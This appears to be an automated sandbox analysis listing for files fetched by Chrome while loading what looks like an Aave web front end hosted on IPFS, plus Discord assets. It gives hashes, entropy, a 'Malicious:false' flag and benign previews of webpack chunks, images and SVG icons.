                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4787],{99730:function(e,r,t){t.d(r,{f:function(){return c}});var n=t(49501),a=t(30120),o=t(29630),i=t(69331),s=t(67916),u=t(85893),c=function(e){var r=e.txError;return(0,u.jsxs)(a.Z,{children:[(0,u.jsx)(s.Q,{txError:r}),"MetaMask Message Signature: User denied message signature."!==r.rawError.message&&"MetaMask Tx Signature: User denied transaction signature."!==r.rawError.message&&(0,u.jsx)(a.Z,{sx:{pt:4},children:(0,u.jsx)(i.v,{severity:"info",children:(0,u.jsxs)(o.Z,{variant:"description",children:[" ",(0,u.jsx)(n.cC,{id:"Tip: Try increasing slippage or reduce input amount"})]})})})]})}},21732:function(e,r,t){t.d(r,{P:function(){return b}});var n=t(90116),a=t(59499),o=t(50029),i=t(87794),s=t.n(i),u=t(75331),c=t(85945),l=t(67294),d=t(74119),f=t(8195),h=t(77537),p=t(78371),v=t(32113),m=t(39771),y=t(31001),x=t(89291);function g(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15040), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15040
                                                                                                                                                                                                                                                  Entropy (8bit):5.398852019740805
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:4yPmUvEg+TA73Ctp7SeUVCv0e6uE4PtPcYprx4BzZ9w:4yPjvt4AGXUVCY4FPcYpr6BI
                                                                                                                                                                                                                                                  MD5:919356EBBBFC9BBECDA1BA9D68325866
                                                                                                                                                                                                                                                  SHA1:B329797D5D79E77FE2D61AE61630747D32538F7A
                                                                                                                                                                                                                                                  SHA-256:7063EB6CEFC6BE0C188A4E799A1F53CFEABD759872909B72651948D970ED41CA
                                                                                                                                                                                                                                                  SHA-512:0ECD20C7D6648220D760989EF1D354E30E50FD47AE61A1BC2DFBAADCDE961D1DB9EA677A9E9C9A2B8D9A90CC402813C872378F885563FD6A648E3A864452549F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9189],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=s},89722:function(e,n,t){t.d(n,{Z:function(){return x}});var r=t(87462),o=t(63366),i=t(67294),s=t(86010),a=t(94780),c=t(81719),l=t(78884),d=t(36622),u=t(34867);function p(e){return(0,u.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var f=t(85893);const m=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:PNG image data, 589 x 581, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):148367
                                                                                                                                                                                                                                                  Entropy (8bit):7.987423434371717
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:QxhGhPIHWXfU5Y/zQkimnNfR3MklgbEVkZkd4nvK31tX/3NkLT3r:QxEhg26M1PlMIgbEVkZC4noLXur
                                                                                                                                                                                                                                                  MD5:E918BA5EE43397B18769583750344766
                                                                                                                                                                                                                                                  SHA1:F7E873E46FBB4F3C2C375B5476CC9B4461083B09
                                                                                                                                                                                                                                                  SHA-256:737BC466F3EF21A044B5455D1F387EAC46EDBABBF038B8A5A11C1FF4ACEE6D95
                                                                                                                                                                                                                                                  SHA-512:E0E25AF2032EE80A27832D856C1FB9855103918008C83724E81AA2955DE1B31DF35DBDD2768032CA00A4F6C6D5D06C1946F6675025C30ABC73DBB58BDABFA4EE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/illustration_desktop.png
                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...M...E........5....pHYs...%...%.IR$.....sRGB.........gAMA......a...C$IDATx....-.U.|...._...6....(.B......`~@...@`l.0.;... ...$.d@`V6 ....$0.(K......f...?.r..;3/I.....Cuuuw.W.9u...`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0..'.......S...`0....0.O\.M..7...E.u.=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):3453
                                                                                                                                                                                                                                                  Entropy (8bit):4.492651407367455
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:1635qoxqZMDwSn6wj6kr0zQw2wrbqlxSv++JmbXv4hP4L+JZiK:sLJD6krqn2mqwKcpSK
                                                                                                                                                                                                                                                  MD5:5B43DB231CBCD2115C8E2A14CC0F5DD9
                                                                                                                                                                                                                                                  SHA1:41C5BC532BCD188ACB28A9C2CCA92A72FC2ACB6D
                                                                                                                                                                                                                                                  SHA-256:5949A0685EF38932D941CA757B2611B260F9DE424664AA9EC051A5EA609B3FF5
                                                                                                                                                                                                                                                  SHA-512:62BAD990A657FF4845EE007B500AFB3FBA4F425397E43CAA457FC04820C837CCB3AB1B0BE380222A56E143EBB84E7437D32523BD55CD98B4B5258D7790FB866D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/tokens/gho.svg
                                                                                                                                                                                                                                                  Preview:<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg"><rect width="256" height="256" rx="128" fill="url(#a)"/><g style="mix-blend-mode:screen" opacity=".8"><path fill-rule="evenodd" clip-rule="evenodd" d="M199.579 190.316v-25.398l-.068-.002-17.48-40.284h-27.969l16.607 39.41h-54.148c-10.441 0-20.295-4.112-27.746-11.578-7.451-7.47-11.56-17.345-11.56-27.806 0-10.461 4.109-20.336 11.56-27.802 7.45-7.466 17.305-11.578 27.746-11.578l51.593-.057-10.925-26.274-40.668.057c-36.128 0-66.837 29.449-66.837 65.654s30.709 65.658 66.837 65.658h83.058Zm-87.449-69.187c7.241 0 13.11-5.882 13.11-13.137 0-7.255-5.869-13.137-13.11-13.137s-13.11 5.882-13.11 13.137c0 7.255 5.869 13.137 13.11 13.137Zm13.11 20.581c0 7.255-5.869 13.137-13.11 13.137s-13.11-5.882-13.11-13.137c0-7.255 5.869-13.137 13.11-13.137s13.11 5.882 13.11 13.137Z" fill="#fff"/><path d="M199.579 164.918h2.5v-2.425l-2.424-.074-.076 2.499Zm0 25.398v2.5h2.5v-2.5h-2.5Zm-.068-25.4-2.294.995.632 1.455 1.5
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17529), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17529
                                                                                                                                                                                                                                                  Entropy (8bit):5.541923843793937
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:tqPQ7VeiHZenof4fOp9r4sRI7OzFNSmCOemzHahwEOVyX8:a8VecZUM5I7Oz3HzHahLX8
                                                                                                                                                                                                                                                  MD5:CB2F5662DB56903ECCADE944E65C622E
                                                                                                                                                                                                                                                  SHA1:059B7C473AAD2FBAB456E1BC1D274E141900C165
                                                                                                                                                                                                                                                  SHA-256:BA603331A85676C23095A823B0684200AD12ABDAF79D5DE2F53B1EF4B9258F56
                                                                                                                                                                                                                                                  SHA-512:4A5690043D3022800B58676CAEB92C28A6341B0A926BD38CAB0A817D1B45E3DB843F589615AFEB795630EE6A013661239458B39CB509534272E090F4ACD67285
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7888],{47130:function(e,t,r){r.d(t,{X:function(){return c}});var n=r(30120),o=r(90149),i=(r(67294),r(73965)),s=r(38776),a=r(85893),c=function(e){var t=e.children,r=(0,i.HT)(),c=r.user;return r.loading?(0,a.jsx)(n.Z,{sx:{width:"100%",display:"flex",alignItems:"center",justifyContent:"center"},children:(0,a.jsx)(o.Z,{})}):((0,s.Z)(c,"User data loaded but no user found"),(0,a.jsx)(a.Fragment,{children:t(c)}))}},29002:function(e,t,r){r.d(t,{o:function(){return u}});var n=r(59499),o=r(4730),i=r(81645),s=r(85893),a=["sx"];function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function l(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7686), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7686
                                                                                                                                                                                                                                                  Entropy (8bit):5.401175716938259
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:yOvPmLqFSd7MVe5wbCenCuRx+4qQLce2OETvcZnxmu5y:ycOLqF9qw2G7x+zAafb4xG
                                                                                                                                                                                                                                                  MD5:9A4C6A7CFD9268100A8B0AB65BBE222C
                                                                                                                                                                                                                                                  SHA1:2C4C4F00A1E2DA2CC2448058260498E2DDD10D98
                                                                                                                                                                                                                                                  SHA-256:D7A5A67CE69A55AFC5182501B919B822E4B5C4BA1E015362EA7D30C53499E47B
                                                                                                                                                                                                                                                  SHA-512:E6DCC3DDB9FF159A8D84986FB2B3F7FE101A9757F023E41FC36A59EA6D6F7FE530C311850C5C07AD04FE4FBE30C93082C0D443DB1366E610AEEFC9476E11604D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7715],{64288:function(e,t,n){n.d(t,{Z:function(){return v}});var i=n(63366),r=n(87462),o=n(67294),a=n(86010),s=n(28320),c=n(34867),u=n(94780),p=n(29628),d=n(13264),m=n(66500),l=n(85893);const f=["className","component","disableGutters","fixed","maxWidth","classes"],x=(0,m.Z)(),g=(0,d.Z)("div",{name:"MuiContainer",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,t[`maxWidth${(0,s.Z)(String(n.maxWidth))}`],n.fixed&&t.fixed,n.disableGutters&&t.disableGutters]}}),h=e=>(0,p.Z)({props:e,name:"MuiContainer",defaultTheme:x});var b=n(36622),w=n(81719),k=n(78884);const $=function(e={}){const{createStyledComponent:t=g,useThemeProps:n=h,componentName:p="MuiContainer"}=e,d=t((({theme:e,ownerState:t})=>(0,r.Z)({width:"100%",marginLeft:"auto",boxSizing:"border-box",marginRight:"auto",display:"block"},!t.disableGutters&&{paddingLeft:e.spacing(2),paddingRight:e.spacing(2),[e.breakpoints.up("sm")]:{paddingLeft
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (57798), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):57798
                                                                                                                                                                                                                                                  Entropy (8bit):5.385619029897784
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:iuouiX+1WSo5TfVPmyeQ65iDDxSrGcMdzbr:JsX+sS/XGcuH
                                                                                                                                                                                                                                                  MD5:7B2A187D5E390CE807486F4DB9D96904
                                                                                                                                                                                                                                                  SHA1:9B13E633633954E9EB30B1AFDFB240DFC7DF90B6
                                                                                                                                                                                                                                                  SHA-256:B21AF8B13F6A9CB0A90C43DA127BD9CC46041DF394B4195DD2AD9B5F676576B1
                                                                                                                                                                                                                                                  SHA-512:F66CF63A1BD344A85C2C3C840C0523886E7F097C9724D485966BC73A71D1303A1AA4A7249F90388DC61246729EEA080792AB92F50BFA9CCB2D4B31CE72A0878A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7091],{54098:function(e,t){var n="undefined"!==typeof self?self:this,i=function(){function e(){this.fetch=!1,this.DOMException=n.DOMException}return e.prototype=n,new e}();!function(e){!function(t){var n="URLSearchParams"in e,i="Symbol"in e&&"iterator"in Symbol,r="FileReader"in e&&"Blob"in e&&function(){try{return new Blob,!0}catch(e){return!1}}(),s="FormData"in e,o="ArrayBuffer"in e;if(o)var a=["[object Int8Array]","[object Uint8Array]","[object Uint8ClampedArray]","[object Int16Array]","[object Uint16Array]","[object Int32Array]","[object Uint32Array]","[object Float32Array]","[object Float64Array]"],c=ArrayBuffer.isView||function(e){return e&&a.indexOf(Object.prototype.toString.call(e))>-1};function u(e){if("string"!==typeof e&&(e=String(e)),/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(e))throw new TypeError("Invalid character in header field name");return e.toLowerCase()}function l(e){return"string"!==typeof e&&(e=String(e)),e}function h
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13675), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):13675
                                                                                                                                                                                                                                                  Entropy (8bit):5.535113943109992
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:U9wPt8LSMeG6I8Jy6n/GRnx6eAyQRbZjSzRI7bKNJjZK6h12V0vdB:9DEqGRnx6eAya8zRI7OzFK6h12S
                                                                                                                                                                                                                                                  MD5:E10D7FCEA044C91DD86128C0589DD6A0
                                                                                                                                                                                                                                                  SHA1:9FF2045CF1F007EE354AA03782B9734C19F0893B
                                                                                                                                                                                                                                                  SHA-256:E31E8B1810F2E28E0EA27E23ECB7EF6B2D5A0019172AB1628E0D4310066C5727
                                                                                                                                                                                                                                                  SHA-512:403B85789144F94E2DCEA9A8BBB9C4E9E11446A953C29E6FAEF2F41559AA1BC31F0FC4F18C1BC870CAC79683DDE7686B9645880646FD9DEF816F9348C29164E2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8019-7233b42ab9ef6fe6.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8019],{45884:function(e,t,r){r.d(t,{h:function(){return i}});var o=r(30120),n=r(85893),i=function(e){var t=e.isRow,r=e.children,i=e.minWidth,s=e.maxWidth,a=e.align,l=void 0===a?"center":a,c=e.overFlow,u=void 0===c?"visible":c,d=e.flex,p=void 0===d?1:d,b=e.p,f=void 0===b?1:b;return(0,n.jsx)(o.Z,{sx:{display:"flex",flexDirection:t?"row":"column",alignItems:t?"center":"left"===l?"flex-start":"right"===l?"flex-end":l,justifyContent:t?"flex-start":"flex-end",flex:p,minWidth:i||"70px",maxWidth:s,overflow:u,padding:f},children:r})}},32383:function(e,t,r){r.d(t,{H:function(){return u}});var o=r(59499),n=r(4730),i=r(30120),s=r(85893),a=["children","minHeight","px","button"];function l(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,o)}return r}function c(e){for(var t=1;t<argume
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25095), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):25095
                                                                                                                                                                                                                                                  Entropy (8bit):5.455472623227908
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:Nn2zK1z18y22flfn1CrWNhoBuAZS+uUEjbEbE9Ez31DbgDB8yMpgmEke9OnQ:NWK1LJtz8QmzRs2R7Eke9OnQ
                                                                                                                                                                                                                                                  MD5:054AAB65218FB623B5EEF9FA56EFF409
                                                                                                                                                                                                                                                  SHA1:BA188939A989CBBFFE20A54C441DE5F0C9C7B79D
                                                                                                                                                                                                                                                  SHA-256:0D702A154F8E26F4099FE6B80690129F058537A7B821D171152B301307791C11
                                                                                                                                                                                                                                                  SHA-512:9DD0C937D1CFEAD97A90708FA8F07F3B56B063F05A008A8C287752E31C787ED377C41AE84B49ADDA8786E1B4A60FD32778CB886338B418C7BCA7E40F5DC9401B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/pages/markets-4f45529ba852aa6f.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1162],{4840:function(e,t,r){"use strict";r.r(t),r.d(t,{MarketContainer:function(){return ge},default:function(){return ve},marketContainerProps:function(){return be}});var n=r(59499),i=r(64288),s=r(30120),o=r(67294),a=r(59631),l=r(49501),c=r(80854),x=r(62097),d=r(61225),u=r(29630),p=r(54181),h=r(45556),m=r(13850),j=r(68861),y=r(69331),f=r(28480),b=r(14795),g=r(46839),v=r(46930),w=r(14379),Z=r(45884),O=r(99435),D=r(1475),P=r(36864),C=r(75084),S=r(11163),A=r(14249),k=r(42115),I=r(71692),E=r(44749),L=r(14463),T=r(19547),V=r(85642),N=r(78371),U=r(57609),M=r(87385),W=r(52906),F=r(35161),_=r(32383),B=r(41024),Y=r(72667),z=r(85893),R=function(e){var t,r=(0,P.Z)({},e),n=(0,S.useRouter)(),i=(0,v.f)().currentMarket,o=(0,N.Y)((function(e){return e.trackEvent})),a=null===(t=V.U[i])||void 0===t?void 0:t[r.symbol],c=(0,M.Pu)(r.symbol,i,M.MF.SUPPLY),x=(0,M.Pu)(r.symbol,i,M.MF.BORROW);return(0,z.jsxs)(_.H,{px:6,minHeight:76,onClick:function(){o(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                                                  Entropy (8bit):5.114377432261608
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tcGcAumc4slmyHSORZQqFbxTmSqgBqDc4:tcGtuIyHjRZQq5sLgBqA4
                                                                                                                                                                                                                                                  MD5:CF35F935EE29ECDC14E56FAD3F87DF16
                                                                                                                                                                                                                                                  SHA1:6EE303DF7BA5468930E37DA8C09E6CBCC3CC9748
                                                                                                                                                                                                                                                  SHA-256:6CF85DA54D4C554DA07B2AEC6F0DF29603D8D28A102ED4E17DCE99A7D7D79B9A
                                                                                                                                                                                                                                                  SHA-512:EC1F0F369B42BEB670B253CFD5AD9D4C15C2DBED08C8804B2C73F19DEE0C561F2EF19D245EDFD999D6166699E04A94D72A8260BD33AD3FEBE699B14EE31889AA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/flags/fr.svg
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M20.099-1.378H-.099V15.38H20.1V-1.379Z" fill="#ED2939"/><path d="M13.367-1.378H-.1V15.38h13.466V-1.379Z" fill="#fff"/><path d="M6.633-1.378H-.099V15.38h6.732V-1.379Z" fill="#002395"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29683), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29683
                                                                                                                                                                                                                                                  Entropy (8bit):5.455287994633197
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:uU/sS8arv8XxI2i5rkNTX5jNHi3o4E4pS+tZbytCXriiGRKq22vFPV:f/sS8acuoJT8o4EcS+tZbytCXfB2v3
                                                                                                                                                                                                                                                  MD5:41266FF7ADC44DD0F279A3A0CEBFB7CA
                                                                                                                                                                                                                                                  SHA1:2A35DEEE10E6E637CC40B818D78532BCBDAAB95B
                                                                                                                                                                                                                                                  SHA-256:1E49F4674D467814D5726D279DE8ED1261A98A34E7F7C58D8E1DB3E2178A8DAF
                                                                                                                                                                                                                                                  SHA-512:53AE26A9DAEA86CD1F3E451AD9A231D00FFDADBA5E0A9AF3459D05F0A528308B064DB8803BAD7D3F864BEF282D6EBFAA3C0CAAEB567177DDC01A31F455732058
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1811.1d478527d9c58149.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1811],{34637:function(e,t,r){r.d(t,{Y:function(){return d},Z:function(){return p}});var n=r(59499),a=r(81719),o=r(87054),s=(r(67294),r(85893));function i(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?i(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):i(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var l=(0,a.ZP)(o.Z)((function(e){var t=e.theme;return{border:"0px",flex:1,backgroundColor:"#383D51",borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{backgroundColor:"#FFFFFF",borderRadius:"4px !im
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (905)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):957
                                                                                                                                                                                                                                                  Entropy (8bit):5.034768569958886
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:Bw1JU1t21f1C1bA19RAHxrV1e7Co1RSg341Nzg5mBU9K9K/sSelw1NeVE:BgJ0t2DKeAtG1Es4Fg57Xeis+
                                                                                                                                                                                                                                                  MD5:20DDAA519E404695D0657D3868D2701F
                                                                                                                                                                                                                                                  SHA1:0BDF7AD9C1F272B72FD83741504A39D5E8097901
                                                                                                                                                                                                                                                  SHA-256:808A1D58F797547FE5A8ACDC841C6CA36E7440E1DCFFF9CB40497CAE9ED11143
                                                                                                                                                                                                                                                  SHA-512:3D556D1EA31E803BB1E4EE11F68DAFC2FD0121E1A0E7EBE0BEDD1AFDFD646B05357842C825FFA0909492BA7FA00530C8B79BCD7A3778CF5B663194DF6D3BC227
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/2917679ca8a08c390036.css
                                                                                                                                                                                                                                                  Preview:.wrapper_cd22e7,.activeWrapper_cd22e7{height:100%;left:0;position:absolute;top:0;width:100%;z-index:1002}.wrapper_cd22e7{pointer-events:none}.videoWrapper_cd22e7{position:absolute;transform:translate(-50%,-50%);top:50%;left:50%;z-index:200;pointer-events:none;width:auto;height:100%}@media(min-aspect-ratio:2880/2048){.videoWrapper_cd22e7{width:100%;height:auto}}.videoWrapperForHelper_cd22e7{position:absolute;pointer-events:none;z-index:200;top:0;left:0;width:100%;height:100%}.gadientHighlight_cd22e7{position:absolute;width:100%;height:100%;pointer-events:none;background-image:linear-gradient(90deg,var(--premium-tier-2-purple-for-gradients)0%,var(--premium-tier-2-purple-for-gradients-2)50%,var(--premium-tier-2-pink-for-gradients)100%)}.swipeWrapper_cd22e7{position:absolute;width:100%;height:100%;pointer-events:none}.swipe_cd22e7{position:absolute;height:100%;opacity:.1;width:auto;right:0;top:0}./*# sourceMappingURL=2917679ca8a08c390036.css.map*/
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3481)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):3530
                                                                                                                                                                                                                                                  Entropy (8bit):5.525597791927395
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:4SloopsVL5u5CfGRxnDFzmThAlvnPE17cXfXTrI1iQhTTrUE7qp6upMNqsykTHuV:CokFVfMD04DvEbrOp6udE6ezfkjj
                                                                                                                                                                                                                                                  MD5:BE6064FF8C1D480AFB80FE48762A06C1
                                                                                                                                                                                                                                                  SHA1:F832A784FAEDB0BCFEE78661031D3C23C622501A
                                                                                                                                                                                                                                                  SHA-256:3666E614B6564F13247BF5E53B0DD5C57F27ED75F397AA839F4B75BF55177203
                                                                                                                                                                                                                                                  SHA-512:78E847E48E1A509B9E01550B10A94EA77D4D6BD9208131DD52FFAA379150660A2B7BA11750CA87173FDE4EB75A99512BC98ABDD6593D47DC1A0B8886905DF08E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/ac625b77a0bab0ee72df.js
